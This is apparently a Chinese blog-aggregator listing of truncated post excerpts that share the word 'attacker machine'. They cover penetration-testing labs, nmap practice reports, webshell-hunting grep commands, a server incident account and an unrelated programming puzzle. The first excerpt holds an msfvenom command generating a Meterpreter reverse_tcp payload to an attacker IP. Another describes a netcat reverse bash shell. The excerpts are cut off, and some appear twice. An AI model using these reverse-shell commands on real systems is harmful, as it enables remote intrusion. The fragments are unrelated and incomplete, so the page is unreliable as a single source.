我们的攻击机IP是192.168.222.133 目标机IP是192.168.222.132 我们首先生成一个powershell msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.222.133 LPORT=444 -f p ...
分类:
其他好文 时间:
2017-06-18 13:23:06
阅读次数:
1135
来自FallDream的博客,未经允许,请勿转载,谢谢。 【题目背景】 拿到了飞机的驾照(?),这样补给就不愁了 XXXX年XX月XX日 拿到了喷气机(??)的驾照,这样就飞得更快了 XXXX年XX月XX日 拿到了攻击机(???)的驾照(不存在的) XXXX年XX月XX日 用铅版做夹层的话,机身可是 ...
分类:
其他好文 时间:
2017-06-03 18:15:32
阅读次数:
455
实践报告 和结对同学一起完成,分别作为攻击方和防守方,提交自己攻击和防守的截图1)攻击方用nmap扫描(给出特定目的的扫描命令)2)防守方用tcpdump嗅探,用Wireshark分析(保留Wireshark的抓包数据),分析出攻击方的扫描目的和nmap命令和赵京鸣一组,攻击机ip为222.28.1 ...
分类:
其他好文 时间:
2017-05-05 14:24:09
阅读次数:
242
Nmap使用实践 我们使用kali1.08攻击机对Linux靶机222.28.136.226进行nmap的相关实践,扫描其他靶机类似。 1、测试是否在线 2、查看靶机开放了哪些TCP和UDP端口及安装了什么网络服务: 3、查看靶机的操作系统版本 nmap使用方法总结: 通过主机探测,确定测试目标地址 ...
分类:
其他好文 时间:
2017-04-30 21:29:36
阅读次数:
543
1.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find/storage/www/-name"*.php"|xargsgrep-in--color"eval("#grep-i--include=‘*.php‘-rsystem\s*\(/storage/www/2.统计访问日志中来自同ip出现的次数分析盗链、攻击、机器人#cataccess.log|awk‘{print..
分类:
Web程序 时间:
2017-03-13 22:26:53
阅读次数:
244
1. 连接后,所有的 ack 为1才有效(连接后,ack 也一般都是1) 2. 建立连接3次握手, 断开连接 4次挥手。 ...
分类:
其他好文 时间:
2017-02-16 11:41:51
阅读次数:
171
在上班路上,看到手机短信里面发送报警信息,一台服务器凌晨4点下线了.匆忙到工位,检查机器果然下线了,报告老板,然后联系机房.大概十分钟后机房回复,机器受到攻击,机房切断了Ip.机器用电信联通双网络,既然电信ip被封,那就用联通的ip进入机器.要素一:机器的硬件信息以及..
分类:
系统相关 时间:
2016-06-17 17:44:44
阅读次数:
305
在上班路上,看到手机短信里面发送报警信息,一台服务器凌晨4点下线了.匆忙到工位,检查机器果然下线了,报告老板,然后联系机房.大概十分钟后机房回复,机器受到攻击,机房切断了Ip.机器用电信联通双网络,既然电信ip被封,那就用联通的ip进入机器.要素一:机器的硬件信息以及..
分类:
系统相关 时间:
2016-06-17 17:42:03
阅读次数:
260
原理 实验环境: 攻击机:windows机器,IP:192.168.12.109 受害机:linux机器,IP:192.168.79.1 攻击机:设置本地监听端口2222 C:\netcat>nc -l -p 2222 受害机:反弹/bin/bash 到攻击机(192.168.12.109)的222
分类:
Web程序 时间:
2016-02-06 14:21:28
阅读次数:
546
1.站点根目录下查找是否被放置webshell木马根据语句判断是不是PHP木马脚本#find/storage/www/-name"*.php"|xargsgrep-in--color"eval("#grep-i--include=‘*.php‘-rsystem\s*\(/storage/www/2.统计访问日志中来自同ip出现的次数分析盗链、攻击、机器人#cataccess.log|awk‘{print..
分类:
其他好文 时间:
2016-02-01 22:41:00
阅读次数:
287